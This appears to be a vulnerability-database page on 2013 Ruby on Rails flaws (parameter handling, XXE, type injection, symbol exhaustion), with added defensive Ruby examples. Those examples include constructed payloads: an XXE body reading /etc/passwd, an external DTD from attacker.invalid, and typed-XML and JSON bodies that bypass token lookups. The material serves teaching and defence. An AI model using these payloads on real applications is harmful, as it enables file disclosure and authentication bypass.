
CVSS: 6.4 | EPSS: 0% | CPEs: 108 | EXPL: 0

actionpack/lib/action_dispatch/http/request.rb in Ruby on Rails before 3.2.16 and 4.x before 4.0.2 does not properly consider differences in parameter handling between the Active Record component and the JSON implementation, which allows remote attackers to bypass intended database-query restrictions and perform NULL checks or trigger missing WHERE clauses via a crafted request that leverages (1) third-party Rack middleware or (2) custom Rack middleware. NOTE: this vulnerability exists because of an incomplete fix for CVE-2013-0155.

• http://lists.opensuse.org/opensuse-updates/2013-12/msg00079.html
• http://lists.opensuse.org/opensuse-updates/2013-12/msg00081.html
• http://lists.opensuse.org/opensuse-updates/2013-12/msg00082.html
• http://lists.opensuse.org/opensuse-updates/2014-01/msg00003.html
• http://rhn.redhat.com/errata/RHSA-2013-1794.html
• http://rhn.redhat.com/errata/RHSA-2014-0008.html
• http://rhn.redhat.com/errata/RHSA-2014-0469.html
• http://weblog.rubyonrails.org/2013/12/3/Rails_3_2_16_and_4_0_2_
• CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
• CWE-264: Permissions, Privileges, and Access Controls

CVSS: 4.3 | EPSS: 1% | CPEs: 5 | EXPL: 1

Multiple format string vulnerabilities in log_subscriber.rb files in the log subscriber component in Action Mailer in Ruby on Rails 3.x before 3.2.15 allow remote attackers to cause a denial of service via a crafted e-mail address that is improperly handled during construction of a log message.

• http://lists.opensuse.org/opensuse-updates/2013-12/msg00091.html
• http://lists.opensuse.org/opensuse-updates/2013-12/msg00094.html
• http://lists.opensuse.org/opensuse-updates/2014-01/msg00003.html
• http://www.debian.org/security/2014/dsa-2887
• http://www.debian.org/security/2014/dsa-2888
• https://groups.google.com/forum/message/raw?msg=ruby-security-ann/yvlR1Vx44c8/elKJkpO2KVgJ
• CWE-134: Use of Externally-Controlled Format String

CVSS: 6.4 | EPSS: 0% | CPEs: 104 | EXPL: 1

The Active Record component in Ruby on Rails 2.3.x, 3.0.x, 3.1.x, and 3.2.x does not ensure that the declared data type of a database column is used during comparisons of input values to stored values in that column, which makes it easier for remote attackers to conduct data-type injection attacks against Ruby on Rails applications via a crafted value, as demonstrated by unintended interaction between the "typed XML" feature and a MySQL database.

• http://openwall.com/lists/oss-security/2013/02/06/7
• http://openwall.com/lists/oss-security/2013/04/24/7
• http://pl.reddit.com/r/netsec/comments/17yajp/mysql_madness_and_rails
• http://www.phenoelit.org/blog/archives/2013/02/index.html
• https://gist.github.com/dakull/5442275
• https://groups.google.com/group/rubyonrails-security/msg/1f3bc0b88a60c1ce?dmode=source&output=gplain
• CWE-20: Improper Input Validation
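An added example of the two halves of this entry (not Active Record's code): a typed-XML body lets the client pick the Ruby class of a value, and quoting by that class instead of by the column's declared type yields `token = 0` against a VARCHAR column, which MySQL evaluates loosely (`'abc' = 0` is true because a non-numeric string converts to 0). `quote_for_column` shows the fixed shape. The parser, the quoting helpers and the SQL layout are simplified models, not Rails' implementation.

```ruby
require 'rexml/document'

# Added example, not Active Record's code. Models this entry:
# 1. a "typed XML" body lets the client choose the Ruby class of a parsed
#    value through the type attribute (integer, boolean or string here);
# 2. quoting that value by its Ruby class instead of by the column's declared
#    type produces "token = 0" for a VARCHAR column, and MySQL evaluates
#    'abc' = 0 as true, so one crafted request matches tokens it never knew.
# Names and the SQL layout are mine; the real quoting code differs in detail.

# Simplified typed-XML parser: <field type="...">text</field> under one root.
def parse_typed_xml(xml)
  doc = REXML::Document.new(xml)
  doc.root.elements.to_a.each_with_object({}) do |el, h|
    text = el.text.to_s
    h[el.name] = case el.attributes['type']
                 when 'integer' then Integer(text, 10)
                 when 'boolean' then text == 'true'
                 else text
                 end
  end
end

def quote_string(value)
  "'#{value.to_s.gsub("'", "''")}'"
end

# Pre-fix shape: the SQL literal is chosen by the Ruby class of the value.
def quote_by_ruby_type(value)
  case value
  when Integer then value.to_s
  when true    then '1'
  when false   then '0'
  else quote_string(value)
  end
end

# Fixed shape: the SQL literal is chosen by the column's declared type.
def quote_for_column(value, column_type)
  case column_type
  when :string
    quote_string(value)
  when :integer
    case value
    when true  then '1'
    when false then '0'
    else Integer(value.to_s, 10).to_s # raises on non-numeric input instead of guessing
    end
  else
    raise ArgumentError, "unsupported column type #{column_type.inspect}"
  end
end

def token_lookup_sql(typed_xml, cast_to_column:, column_type: :string)
  value = parse_typed_xml(typed_xml).fetch('token')
  literal = cast_to_column ? quote_for_column(value, column_type) : quote_by_ruby_type(value)
  "SELECT * FROM users WHERE token = #{literal}"
end

# Constructed request bodies: the hostile ones assert a non-string type.
INTEGER_ZERO_BODY  = '<user><token type="integer">0</token></user>'
BOOLEAN_FALSE_BODY = '<user><token type="boolean">false</token></user>'
NORMAL_BODY        = '<user><token>abc123</token></user>'

if __FILE__ == $PROGRAM_NAME
  puts token_lookup_sql(INTEGER_ZERO_BODY, cast_to_column: false) # token = 0
  puts token_lookup_sql(INTEGER_ZERO_BODY, cast_to_column: true)  # token = '0'
end
```

The casting side is only half of a defence: an application that expects a string should also reject non-string parameter values before they reach a query, since a later change to the column type would silently change the comparison again.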

CVSS: 5.8 | EPSS: 1% | CPEs: 47 | EXPL: 0

The ActiveSupport::XmlMini_JDOM backend in lib/active_support/xml_mini/jdom.rb in the Active Support component in Ruby on Rails 3.0.x and 3.1.x before 3.1.12 and 3.2.x before 3.2.13, when JRuby is used, does not properly restrict the capabilities of the XML parser, which allows remote attackers to read arbitrary files or cause a denial of service (resource consumption) via vectors involving (1) an external DTD or (2) an external entity declaration in conjunction with an entity reference.

• http://lists.apple.com/archives/security-announce/2013/Jun/msg00000.html
• http://lists.apple.com/archives/security-announce/2013/Oct/msg00006.html
• http://support.apple.com/kb/HT5784
• http://weblog.rubyonrails.org/2013/3/18/SEC-ANN-Rails-3-2-13-3-1-12-and-2-3-18-have-been-released
• https://groups.google.com/group/rubyonrails-security/msg/6c2482d4ed1545e6?dmode=source&output=gplain
• CWE-20: Improper Input Validation
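A backend-independent check for the two vectors in this entry, added here as an example and not the Rails fix itself: both an external DTD and an external entity declaration have to appear inside a `<!DOCTYPE ...>`, so a request layer that refuses any DOCTYPE closes both before the body reaches whichever parser is configured. Names are mine; REXML is used only to show the accepted document still parses, and the payloads are constructed.

```ruby
require 'rexml/document'

# Added example, not the Rails fix. Refuses XML request bodies that carry a
# DOCTYPE, since external DTDs and external entity declarations both live
# there, and caps entity expansion where the backend exposes a knob.

class UntrustedXmlError < StandardError; end

DOCTYPE_RE = /<!DOCTYPE/i

# REXML's expansion cap; a "billion laughs" body fails instead of growing.
REXML::Security.entity_expansion_limit = 100 if defined?(REXML::Security)

def parse_untrusted_xml(xml, max_bytes: 1_000_000)
  raise UntrustedXmlError, 'body too large' if xml.bytesize > max_bytes
  raise UntrustedXmlError, 'DOCTYPE is not accepted in request bodies' if xml.match?(DOCTYPE_RE)
  doc = REXML::Document.new(xml)
  raise UntrustedXmlError, 'no root element' if doc.root.nil?
  doc.root.elements.to_a.each_with_object({}) { |el, h| h[el.name] = el.text.to_s }
end

# Returns the outcome the request layer acts on: [:accepted, hash] or [:rejected, reason].
def classify_body(xml)
  [:accepted, parse_untrusted_xml(xml)]
rescue UntrustedXmlError => e
  [:rejected, e.message]
end

# Constructed payloads for the two vectors named in the entry.
XXE_FILE_READ = <<~XML
  <?xml version="1.0"?>
  <!DOCTYPE user [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
  <user><name>&xxe;</name></user>
XML

EXTERNAL_DTD = <<~XML
  <!DOCTYPE user SYSTEM "http://attacker.invalid/evil.dtd">
  <user><name>alice</name></user>
XML

BENIGN = '<user><name>alice</name><email>alice@example.com</email></user>'

if __FILE__ == $PROGRAM_NAME
  [XXE_FILE_READ, EXTERNAL_DTD, BENIGN].each { |body| p classify_body(body) }
end
```

The substring match is deliberately blunt: a DOCTYPE inside a comment is also rejected, which is acceptable for machine-generated request bodies. On JRuby the equivalent belongs on the JDOM/JAXP factory (disabling DOCTYPE declarations and external DTD loading), but a pre-parse check like this one does not depend on remembering to set those features on every backend.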

CVSS: 5.0 | EPSS: 8% | CPEs: 62 | EXPL: 0

The Active Record component in Ruby on Rails 2.3.x before 2.3.18, 3.1.x before 3.1.12, and 3.2.x before 3.2.13 processes certain queries by converting hash keys to symbols, which allows remote attackers to cause a denial of service via crafted input to a where method. A flaw was found in the way Ruby on Rails handled hashes in certain queries. A remote attacker could use this flaw to perform a denial of service (resource consumption) attack by sending specially crafted queries that would result in the creation of Ruby symbols, which were never garbage collected.

• http://lists.apple.com/archives/security-announce/2013/Jun/msg00000.html
• http://lists.apple.com/archives/security-announce/2013/Oct/msg00006.html
• http://lists.opensuse.org/opensuse-updates/2013-04/msg00070.html
• http://lists.opensuse.org/opensuse-updates/2013-04/msg00071.html
• http://lists.opensuse.org/opensuse-updates/2013-04/msg00075.html
• http://lists.opensuse.org/opensuse-updates/2013-04/msg00078.html
• http://lists.opensuse.org/opensuse-updates/2013-04/msg00079.html
• http://rhn.redhat.com
• CWE-20: Improper Input Validation
• CWE-400: Uncontrolled Resource Consumption
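One added example that serves this entry and the JSON parameter-handling entry at the top of the page (it is not Rails' code): a minimal model of turning a JSON request body into a hash condition for a `where`-style query. Keys are only interned into Symbols when they name an allowed column, so a request cannot mint symbols without bound; values are stripped of nil in the spirit of the deep_munge fix, because `[nil]` passes a naive presence check yet reaches the query as `IS NULL`, which is what middleware reading parameters ahead of the incomplete fix still saw. `render_predicate` is a simplified stand-in for the predicate builder of that era; real Active Record output differs in quoting and table prefixes. Names, the column allowlist and the request bodies are mine.

```ruby
require 'json'

# Added example, not Rails' code. Models two entries on this page:
# - keys: user strings become Symbols only when they are an allowed column
#   name, so a request cannot intern unbounded symbols (resource consumption);
# - values: nils are dropped from arrays and an array left empty becomes nil,
#   in the spirit of the deep_munge fix, so "[null]" in JSON no longer reaches
#   the query as IS NULL while passing an app's presence check.
# render_predicate is a simplified stand-in for the predicate builder.

ALLOWED_COLUMNS = %w[id email token].freeze

def deep_munge(value)
  case value
  when Hash
    value.each { |k, v| value[k] = deep_munge(v) }
  when Array
    value.map! { |v| deep_munge(v) }.compact!
    value.empty? ? nil : value
  else
    value
  end
end

def quote(value)
  value.is_a?(Integer) ? value.to_s : "'#{value.to_s.gsub("'", "''")}'"
end

# nil -> IS NULL; [nil] -> IS NULL; [] -> never matches; mixed -> IN ... OR IS NULL
def render_predicate(column, value)
  case value
  when nil
    "#{column} IS NULL"
  when Array
    non_nil = value.compact
    if value.empty? then '1=0'
    elsif non_nil.empty? then "#{column} IS NULL"
    elsif non_nil.size < value.size
      "(#{column} IN (#{non_nil.map { |v| quote(v) }.join(', ')}) OR #{column} IS NULL)"
    else
      "#{column} IN (#{non_nil.map { |v| quote(v) }.join(', ')})"
    end
  else
    "#{column} = #{quote(value)}"
  end
end

# Only allowlisted keys are turned into Symbols; other keys are dropped unread.
def build_conditions(params, munge:)
  params = deep_munge(params) if munge
  params.each_with_object({}) do |(key, value), conds|
    conds[key.to_sym] = value if ALLOWED_COLUMNS.include?(key)
  end
end

def where_sql(conditions)
  return 'SELECT * FROM users' if conditions.empty? # no WHERE clause at all
  'SELECT * FROM users WHERE ' + conditions.map { |c, v| render_predicate(c, v) }.join(' AND ')
end

# The kind of presence check an application writes before querying; [nil] passes it.
def value_present?(value)
  !(value.nil? || (value.respond_to?(:empty?) && value.empty?))
end

# Full path: JSON body -> params -> conditions -> SQL, or :rejected.
def token_lookup(json_body, munge:)
  conds = build_conditions(JSON.parse(json_body), munge: munge)
  return :rejected unless value_present?(conds[:token])
  where_sql(conds)
end

# Symbols interned while handling a batch of request keys, allowlist on or off.
# The symbols are held in `minted` so garbage collection does not hide them.
def symbols_interned(keys, allowlist:)
  before = Symbol.all_symbols.size
  minted = []
  keys.each { |k| minted << k.to_sym if !allowlist || ALLOWED_COLUMNS.include?(k) }
  [Symbol.all_symbols.size - before, minted.size]
end

if __FILE__ == $PROGRAM_NAME
  puts token_lookup('{"token":[null]}', munge: false) # constructed body: token IS NULL
  puts token_lookup('{"token":[null]}', munge: true)  # rejected
end
```

Ruby 2.2 and later collect dynamically created symbols, which blunts the symbol-table part of this class of bug, but the allowlist is still the right shape: column names are a closed set known to the application, so there is no reason to derive a Symbol from request input at all.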